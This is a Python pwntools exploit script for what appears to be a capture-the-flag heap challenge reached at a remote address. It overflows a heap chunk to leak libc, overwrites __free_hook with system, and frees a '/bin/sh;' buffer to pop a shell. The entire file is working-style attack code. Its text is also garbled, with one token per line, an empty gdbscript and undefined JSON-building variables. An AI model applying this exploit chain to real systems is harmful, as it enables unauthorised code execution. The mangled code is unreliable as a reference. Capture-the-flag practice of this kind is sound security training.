from
pwn
import
*
s
=
lambda
data :io.send(data)
sa
=
lambda
delim,data :io.sendafter(
str
(delim), data)
sl
=
lambda
data :io.sendline(data)
sla
=
lambda
delim,data :io.sendlineafter(
str
(delim), data)
r
=
lambda
num :io.recv(num)
rl
=
lambda
:io.recvline()
ru
=
lambda
delims, drop
=
True
:io.recvuntil(delims, drop)
itr
=
lambda
:io.interactive()
uu32
=
lambda
data :u32(data.ljust(
4
,b
'\x00'
))
uu64
=
lambda
data :u64(data.ljust(
8
,b
'\x00'
))
ls
=
lambda
data :log.success(data)
lss
=
lambda
s :log.success(
'\033[1;31;40m%s --> 0x%x \033[0m'
%
(s,
eval
(s)))
context.arch
=
'amd64'
context.log_level
=
'debug'
context.terminal
=
[
'tmux'
,
'splitw'
,
'-h'
,
'-l'
,
'130'
]
def
start(binary,argv
=
[],
*
a,
*
*
kw):
if
args.GDB:
return
gdb.debug([binary]
+
argv, gdbscript
=
gdbscript,
*
a,
*
*
kw)
elif
args.RE:
return
remote(
'39.106.48.123'
,
30155
)
else
:
return
process([binary]
+
argv,
*
a,
*
*
kw)
binary
=
'./pwn'
libelf
=
''
if
(binary!
=
''): elf
=
ELF(binary) ; rop
=
ROP(binary);libc
=
elf.libc
if
(libelf!
=
''): libc
=
ELF(libelf)
gdbscript
=
.
format
(
*
*
locals
())
io
=
start(binary)
def
add(idx
=
0
,l
=
0
,meg
=
'A'
):
ru(
'Please input:'
)
json
=
'{'
+
f
+
'}'
json
=
json.replace(
'\n'
,'
').replace('
','
')
sl(json)
def
rm(idx
=
0
,l
=
0
,meg
=
'A'
):
ru(
'Please input:'
)
json
=
'{'
+
f
+
'}'
json
=
json.replace(
'\n'
,'
').replace('
','
')
sl(json)
def
show(idx
=
0
,l
=
0
,meg
=
'A'
):
ru(
'Please input:'
)
json
=
'{'
+
f
+
'}'
json
=
json.replace(
'\n'
,'
').replace('
','
')
sl(json)
def
edit(idx
=
0
,l
=
0
,meg
=
'A'
):
ru(
'Please input:'
)
json
=
'{'
+
f
+
'}'
json
=
json.replace(
'\n'
,'
').replace('
','
')
sl(json)
add(
0
,
0x78
,
"I"
*
0x28
)
add(
1
,
0x3f8
,
"A"
*
0x28
)
add(
2
,
0x78
,
"I"
*
0x28
)
add(
3
,
0x78
,
"I"
*
0x28
)
edit(
0
,
736
+
0xa
,b
'Y'
*
(
736
+
8
)
+
p16(
0x401
+
0x50
*
5
+
0x20
*
5
))
rm(
1
)
add(
4
,
16
,'')
edit(
4
,
1
,b
"C"
)
show(
4
)
ru(
'message:'
)
libc_base
=
uu64(r(
6
))
-
2018115
lss(
'libc_base'
)
rm(
2
)
rm(
3
)
ru(
'Please input:'
)
json
=
b
'{"choice":"modify","index":3, "length": 9, "message":"'
+
p64(libc_base
+
libc.sym[
'__free_hook'
])[:
6
]
+
b
'"}'
json
=
json.replace(b
' '
,b'')
print
(json)
sl(json)
add(
5
,
0x78
,
'/bin/sh;'
)
ru(
'Please input:'
)
json
=
b
'{"choice":"new","index":6, "length": 120, "message":"'
+
p64(libc_base
+
libc.sym[
'system'
])[:
6
]
+
b
'"}'
json
=
json.replace(b
' '
,b'')
print
(json)
sl(json)
rm(
5
)
io.interactive()